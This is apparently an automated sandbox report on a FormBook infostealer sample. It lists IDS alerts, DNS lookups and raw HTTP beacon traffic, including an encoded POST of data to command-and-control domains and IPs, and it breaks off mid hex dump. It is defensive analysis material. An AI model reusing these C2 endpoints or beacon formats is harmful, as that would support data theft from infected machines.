                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49729 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49744 -> 217.160.0.236:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49692 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49745 -> 217.160.0.236:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49746 -> 217.160.0.236:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49737 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49722 -> 63.250.38.223:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49739 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49733 -> 52.20.84.62:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49705 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49707 -> 213.142.151.128:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 13.248.169.48:80
                Source: DNS query: www.malekenterprise.xyz
                Source: DNS query: www.publicblockchain.xyz
                Source: DNS query: www.345bet.xyz
                Source: DNS query: www.blogkart4u.xyz
                Source: Joe Sandbox ViewIP Address: 69.57.163.64 69.57.163.64
                Source: Joe Sandbox ViewIP Address: 52.20.84.62 52.20.84.62
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: FORTRESSITXUS FORTRESSITXUS
                Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00C022EE
                Source: global trafficHTTP traffic detected: GET /hhkr/?uPHHu=_z_tpP8HBf1h7L&Tnr4=WRQ8nVzWgf/KQb0ffeL0NeJgxUU5jHqpE4F9OlCDBWcYmzOLcWNI7EIKhLkmTG4ytMpH6x968ud+WyJij7QLLYJhYRSYmfOVCS4Ie3x571q7zvX1v4fG7xafsv/VGGsDPR9jApI= HTTP/1.1Host: www.yard.chatAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /rqbc/?Tnr4=5sg9WStJmed6VjME3Kfe64Nik1rgYAPNNF5Ls1M9hX3++qOsrt9497SUNUde2qgu72/qGY5naHSQYzut4RKp4QqGEa91kg1ikfOvY3RyLrA+VLwXosCJadmgKbAgqD9rCKI/1Sc=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.xdoge.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /simb/?Tnr4=YF5NZKfoWrUTagU3xipk95bNO3A2Uo0Yqz/jxfC4ZHk2x4S5thf0Fhq6ePlTgF/E3KWq/74v03hjGMiGQlMQ12K2cDRB800U4a4efHNXWIoMutGr9DMNxYR0APwlJlgxon9toyE=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.vibew.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /q0rl/?uPHHu=_z_tpP8HBf1h7L&Tnr4=cjMLiUPNIEKJRugcD5ie306E1QcAw2RoM5jZ77MdzVxw4sbikGHVlnGZceJj7Lt12zvS9KA7LQu5CY7HsPt3NtQdR0Pj7m7/Fh+MJbRBzXz2GOV6Ht+5dKEKJq3v6B43JBIQxu4= HTTP/1.1Host: www.sld6.restAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /2dt5/?Tnr4=4kbHOJ5UYllas5e2iij02JK+boi82emZWDKmHL0N5SGoT/v+gNuEoV69wccNvmLlBapPkisqolcfLKFoOywAP3/42XNlVC09KTjOisrbeJoWLlZaXNtKwDgIErLYWaKwXKbnv6Y=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.etkisigorta.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /mc5z/?Tnr4=NpqnvLA9EbuQt0iMwFu/oz6vB3ORQ00reOKN09MhZWvBSGGBRjAjVic3mvcr96DByWV4WVs8Iu37CuPERBjs/nfd4IP88j8uZBF5+C05Gdnervq5IHqmO28iHdKXOU+X00CtZik=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /t4gy/?Tnr4=tbIjJCDecWG72PJ5fm6b+cp9DyvLm3co3Sr9u1+1s+ZTVcHcO2iEE/p1jUnGhbn0RJW7nG3/a6NuIssH9vveTL5CjhxZ7N42ruVLzRcVDs708bKLrcKm4bUk5TTz5HHIdf1WQeo=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.rumgdz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /oxmr/?Tnr4=dkqOKZxAWAfqF14TdagjacdbJGfC3IMP7FxnUgaMU/THCxiFl5t/P/s6rrD/6+ZFKnerhMJxPkxfkyrK3Ba3lGbL7zQUKdgjO5wbMYpMbwLOvmJM3uGA4weUg7T5tB5U77MPouQ=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.malekenterprise.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /alsx/?Tnr4=W7ZSZbLBqSBrvcVxsmXo5NeDybmSShEc+AeEz0V7qSLh5sg23ZZgawUM3DF8n0b743HC/wqdeXgx2Ge7ivuf8sINsiNnFZOTuhlk3uIkr+eGcANWChrsy/BT6b4URUDT4fbqIY0=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.eatdaba.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ttj6/?uPHHu=_z_tpP8HBf1h7L&Tnr4=iF0RL9l91cg/r0ryQ96WkUNoN9S7LbfTbsX3VnFoQx5VcqP5rWYrT0esrSS4eYlVGZhUHSx68xLL+nijBbyUWKPBvFr7glfWA/g5tMixzA2ZYbFuPnI5pQcth7bM56Eo8KDC5n0= HTTP/1.1Host: www.publicblockchain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /4t2c/?Tnr4=hOUZp5zhvvvboVHsfQWKoxRySvJL0REK4o7e+wZhZ0xEWil2dLuRW7oNpvvSf5mmi2LDrhOnXxJLvULiJeHG7Ds4wBioh44i3wQ35aHTdRk4cyHVhez8Cos59JJ6dcbW7TpJ6PY=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.345bet.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /apzq/?Tnr4=au1daHn9wgKf20+4s5dbudIXdZzi7fKeXAClWCeNG3Sywxkl0XeeTL4ILw5N/PIPOKD1smdtPeAjU/QWU0zFhr8bb8xhTOARpfQ1YDYAX/Dg26UvL9QFnWin6MOo5kPAP1TFOYQ=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /fxbr/?Tnr4=F/wA59/4/M9Nbi+sYUut4lw4PyasZ4+QWhvhIz395jUmn9BeNZ3e9xnfgjNBe04yuchCnwG0nupCHtnuD77J/u3aAmnjye4VyjCTXl4QOEwQem27w/Snxb7MVGNvnHCYi6/+ZTU=&uPHHu=_z_tpP8HBf1h7L HTTP/1.1Host: www.amzavy.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /7l8c/?uPHHu=_z_tpP8HBf1h7L&Tnr4=2L5r1I0NkwgmoCkaXFUV7PCjqfXABYSQQmPr+mb88xsc18l5JsrN8P4na/1zovBp/q08i+U2Dq1Q+7aBg2wuNyOZ1KbCbgVzIrysq/l8ttDN1LqrPECJndLPG7SoDpGOs/jtiHg= HTTP/1.1Host: www.thisisnonft.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.yard.chat
                Source: global trafficDNS traffic detected: DNS query: www.xdoge.live
                Source: global trafficDNS traffic detected: DNS query: www.keertdx.cloud
                Source: global trafficDNS traffic detected: DNS query: www.vibew.live
                Source: global trafficDNS traffic detected: DNS query: www.sld6.rest
                Source: global trafficDNS traffic detected: DNS query: www.etkisigorta.net
                Source: global trafficDNS traffic detected: DNS query: www.savposalore.shop
                Source: global trafficDNS traffic detected: DNS query: www.rumgdz.info
                Source: global trafficDNS traffic detected: DNS query: www.malekenterprise.xyz
                Source: global trafficDNS traffic detected: DNS query: www.eatdaba.shop
                Source: global trafficDNS traffic detected: DNS query: www.publicblockchain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.345bet.xyz
                Source: global trafficDNS traffic detected: DNS query: www.blogkart4u.xyz
                Source: global trafficDNS traffic detected: DNS query: www.amzavy.info
                Source: global trafficDNS traffic detected: DNS query: www.thisisnonft.studio
                Source: unknownHTTP traffic detected: POST /rqbc/ HTTP/1.1Host: www.xdoge.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflateContent-Length: 209Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.xdoge.liveReferer: http://www.xdoge.live/rqbc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MATP; MATP; rv:11.0) like GeckoData Raw: 54 6e 72 34 3d 30 75 49 64 56 6d 51 72 74 4d 39 39 49 69 67 4a 33 75 37 68 71 71 52 4d 79 33 57 48 54 68 66 45 63 46 31 71 2f 41 41 6f 75 42 37 76 39 59 53 6a 6b 34 70 65 2f 49 61 41 4d 33 74 78 77 49 63 65 33 53 6a 32 47 49 49 66 53 68 6e 57 58 43 58 54 79 7a 33 50 75 79 47 68 63 38 5a 49 69 78 78 62 74 4e 79 43 48 57 42 62 53 61 6b 64 64 65 59 6c 69 4e 36 30 58 5a 6d 36 4c 73 59 65 74 6d 49 39 54 37 73 59 39 58 5a 66 64 6f 78 6c 30 49 47 36 76 50 59 66 61 4f 32 4a 46 37 31 4d 4b 4e 4d 58 53 44 6a 46 72 63 45 67 6e 4c 62 52 72 4e 39 38 39 2f 62 78 56 55 31 4e 56 36 44 42 56 58 6f 63 4b 36 4b 6f 5a 62 6e 58 6c 4c 53 55 Data Ascii: Tnr4=0uIdVmQrtM99IigJ3u7hqqRMy3WHThfEcF1q/AAouB7v9YSjk4pe/IaAM3txwIce3Sj2GIIfShnWXCXTyz3PuyGhc8ZIixxbtNyCHWBbSakddeYliN60XZm6LsYetmI9T7sY9XZfdoxl0IG6vPYfaO2JF71MKNMXSDjFrcEgnLbRrN989/bxVU1NV6DBVXocK6KoZbnXlLSU
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 21:32:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 21:32:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 21:32:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 21:32:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 30 Nov 2021 07:33:06 GMTetag: "328-61a5d3b2-38620fcf47369696;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 456date: Mon, 17 Mar 2025 21:31:47 GMTserver: LiteSpeedx-powered-by: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 7d 53 c1 72 d4 30 0c bd f7 2b 84 2f 85 99 66 c3 32 3d 30 10 e7 00 94 e1 04 3b b4 17 4e 8c d6 d6 d6 a6 8e 1d 6c 25 db fd 7b 94 ec 6e 1b 0e 70 92 a3 a7 f7 a4 27 3b cd 8b 4f df 3e de fd d8 dc 80 e3 2e b4 17 cd 14 20 60 bc d7 8a a2 9a 12 84 b6 bd 00 68 3a 62 04 e3 30 17 62 ad 06 de 55 6f d5 33 e0 98 fb 8a 7e 0f 7e d4 ea b1 1a b0 32 a9 eb 91 fd 36 90 02 93 22 53 14 96 27 4d f6 9e 16 bc 88 1d 69 35 7a da f7 29 f3 a2 74 ef 2d 3b 6d 69 f4 86 aa f9 e3 0a 7c f4 ec 31 54 c5 60 20 bd be 82 e2 b2 8f 0f 15 a7 6a e7 59 c7 74 14 66 cf 81 da eb d7 d7 f0 35 31 7c 4e 43 b4 4d 7d 4c 4e 70 10 0a 64 0a 5a 15 3e 04 2a 8e 48 1a bb 4c 3b ad 6a ca 39 e5 9f 36 99 52 1f d1 95 29 65 da 43 7d 5c 44 b3 4d f6 20 c1 fa 11 4c c0 52 b4 ea f1 ec 68 91 ec d0 c7 39 29 69 b7 6e 6f 29 8f 94 e1 66 52 17 a9 f5 09 59 10 e6 c6 b2 35 2b 5a 32 7a 53 0b 76 e6 bf 69 37 d2 63 e9 46 52 47 ac 3f f3 83 8c a7 da 3b e7 0b 4c 03 01 79 76 d2 d1 26 2a f1 92 81 1e 7d e1 2b 48 19 3c 43 97 46 b2 50 52 47 7b a9 91 da 50 68 d5 d4 fd b9 5f ae cf ea 22 88 7c 59 60 2f 01 0e 69 00 83 51 34 9f 6b 17 0e 1c 85 be 42 c3 3e c5 72 b2 2e 05 78 da ec 2f 1c b1 98 ec 7b 7e 17 92 c1 a9 6a 25 97 90 d0 be 7c f5 5e b5 df e7 23 4c 3e 9b 1a ff c7 16 87 9c f2 61 b5 45 f3 30 53 3f c8 01 38 c1 26 cb 63 49 43 f9 a7 48 ad da 2f e2 f9 6f fc 69 d1 a7 c3 53 38 5d 74 3d ff 18 7f 00 b9 8c 78 1e 28 03 00 00 Data Ascii: }Sr0+/f2=0;Nl%{np';O>. `h:b0bUo3~~26"S'Mi5z)t-;mi|1T` jYtf51|NCM}LNpdZ>*HL;j96R)eC}\DM LRh9)ino)fRY5+Z2zSvi7cFRG?;Lyv&*}+H<CFPRG{Ph_"|Y`/iQ4kB>r.x/{~j%|^#L>aE0S?8&cICH/oiS8]t=x(
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 30 Nov 2021 07:33:06 GMTetag: "328-61a5d3b2-38620fcf47369696;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 456date: Mon, 17 Mar 2025 21:31:50 GMTserver: LiteSpeedx-powered-by: PleskLinData Raw: 1f 8b 08 00 00 00 00 00 00 03 7d 53 c1 72 d4 30 0c bd f7 2b 84 2f 85 99 66 c3 32 3d 30 10 e7 00 94 e1 04 3b b4 17 4e 8c d6 d6 d6 a6 8e 1d 6c 25 db fd 7b 94 ec 6e 1b 0e 70 92 a3 a7 f7 a4 27 3b cd 8b 4f df 3e de fd d8 dc 80 e3 2e b4 17 cd 14 20 60 bc d7 8a a2 9a 12 84 b6 bd 00 68 3a 62 04 e3 30 17 62 ad 06 de 55 6f d5 33 e0 98 fb 8a 7e 0f 7e d4 ea b1 1a b0 32 a9 eb 91 fd 36 90 02 93 22 53 14 96 27 4d f6 9e 16 bc 88 1d 69 35 7a da f7 29 f3 a2 74 ef 2d 3b 6d 69 f4 86 aa f9 e3 0a 7c f4 ec 31 54 c5 60 20 bd be 82 e2 b2 8f 0f 15 a7 6a e7 59 c7 74 14 66 cf 81 da eb d7 d7 f0 35 31 7c 4e 43 b4 4d 7d 4c 4e 70 10 0a 64 0a 5a 15 3e 04 2a 8e 48 1a bb 4c 3b ad 6a ca 39 e5 9f 36 99 52 1f d1 95 29 65 da 43 7d 5c 44 b3 4d f6 20 c1 fa 11 4c c0 52 b4 ea f1 ec 68 91 